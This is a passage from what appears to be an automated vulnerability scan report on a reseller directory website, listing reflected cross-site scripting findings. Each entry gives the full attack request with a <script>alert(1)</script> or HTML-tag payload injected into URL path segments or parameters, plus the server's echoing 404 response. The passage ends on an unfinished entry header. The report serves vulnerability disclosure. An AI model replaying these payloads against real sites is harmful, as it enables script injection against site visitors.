2.2071. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5e990<script>alert(1)</script>66c41fb553e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295e990<script>alert(1)</script>66c41fb553e/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295e990<script>alert(1)</script>66c41fb553e/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2072. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2715e<script>alert(1)</script>4d30ef1bb11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes2715e<script>alert(1)</script>4d30ef1bb11/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes2715e<script>alert(1)</script>4d30ef1bb11/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2073. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29372<script>alert(1)</script>3a45a353383 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/search.php29372<script>alert(1)</script>3a45a353383?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php29372<script>alert(1)</script>3a45a353383?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2074. http://www.resellerbase.com/detail/29/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 400fd<a>cd2b7853de6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search400fd<a>cd2b7853de6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search400fd<a>cd2b7853de6&opt=2 was not found on this server.</p>
...[SNIP]...

2.2075. http://www.resellerbase.com/detail/29/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7eb82<a>eb6c4927faa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...7eb82<a>eb6c4927faa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...7eb82<a>eb6c4927faa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2076. http://www.resellerbase.com/detail/29/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b244<script>alert(1)</script>7615a528717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2&3b244<script>alert(1)</script>7615a528717=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2&3b244<script>alert(1)</script>7615a528717=1 was not found on this server.</p>
...[SNIP]...

2.2077. http://www.resellerbase.com/detail/29/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b9b5f<a>f2915eee5f2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2b9b5f<a>f2915eee5f2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2b9b5f<a>f2915eee5f2 was not found on this server.</p>
...[SNIP]...

2.2078. http://www.resellerbase.com/detail/30/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d97e4<script>alert(1)</script>494b89f58c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild97e4<script>alert(1)</script>494b89f58c6/30/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild97e4<script>alert(1)</script>494b89f58c6/30/ was not found on this server.</p>
...[SNIP]...

2.2079. http://www.resellerbase.com/detail/30/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058c<script>alert(1)</script>bc46e15f2af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30a058c<script>alert(1)</script>bc46e15f2af/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30a058c<script>alert(1)</script>bc46e15f2af/ was not found on this server.</p>
...[SNIP]...

2.2080. http://www.resellerbase.com/detail/30/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ac7e<script>alert(1)</script>baaa66a870a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/?1ac7e<script>alert(1)</script>baaa66a870a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/?1ac7e<script>alert(1)</script>baaa66a870a=1 was not found on this server.</p>
...[SNIP]...

2.2081. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8399<script>alert(1)</script>d457dfcc58b16ba70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /detaild8399<script>alert(1)</script>d457dfcc58b16ba70/30/rating.php?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8399<script>alert(1)</script>d457dfcc58b16ba70/30/rating.php?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2082. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82cc1<script>alert(1)</script>58d26bf1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail82cc1<script>alert(1)</script>58d26bf1c10/30/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail82cc1<script>alert(1)</script>58d26bf1c10/30/rating.php was not found on this server.</p>
...[SNIP]...

2.2083. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5890a<script>alert(1)</script>d4b028547f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/305890a<script>alert(1)</script>d4b028547f9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/305890a<script>alert(1)</script>d4b028547f9/rating.php was not found on this server.</p>
...[SNIP]...

2.2084. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload acd67<script>alert(1)</script>250a083af8f732a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30acd67<script>alert(1)</script>250a083af8f732a0/rating.php?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30acd67<script>alert(1)</script>250a083af8f732a0/rating.php?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2085. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99f79<script>alert(1)</script>a24c0a19c52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/rating.php99f79<script>alert(1)</script>a24c0a19c52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php99f79<script>alert(1)</script>a24c0a19c52 was not found on this server.</p>
...[SNIP]...

2.2086. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76b26<script>alert(1)</script>0ac60ab7725c50f08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30/rating.php76b26<script>alert(1)</script>0ac60ab7725c50f08?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php76b26<script>alert(1)</script>0ac60ab7725c50f08?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2087. http://www.resellerbase.com/detail/30/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 553c0<script>alert(1)</script>72408b493537cc3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30/rating.php/553c0<script>alert(1)</script>72408b493537cc3a5?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php/553c0<script>alert(1)</script>72408b493537cc3a5?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2088. http://www.resellerbase.com/detail/30/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc662<script>alert(1)</script>c18c888c24b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/rating.php?fc662<script>alert(1)</script>c18c888c24b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php?fc662<script>alert(1)</script>c18c888c24b=1 was not found on this server.</p>
...[SNIP]...

2.2089. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9054<script>alert(1)</script>04127e4da2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf9054<script>alert(1)</script>04127e4da2/30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf9054<script>alert(1)</script>04127e4da2/30/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2090. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 2]
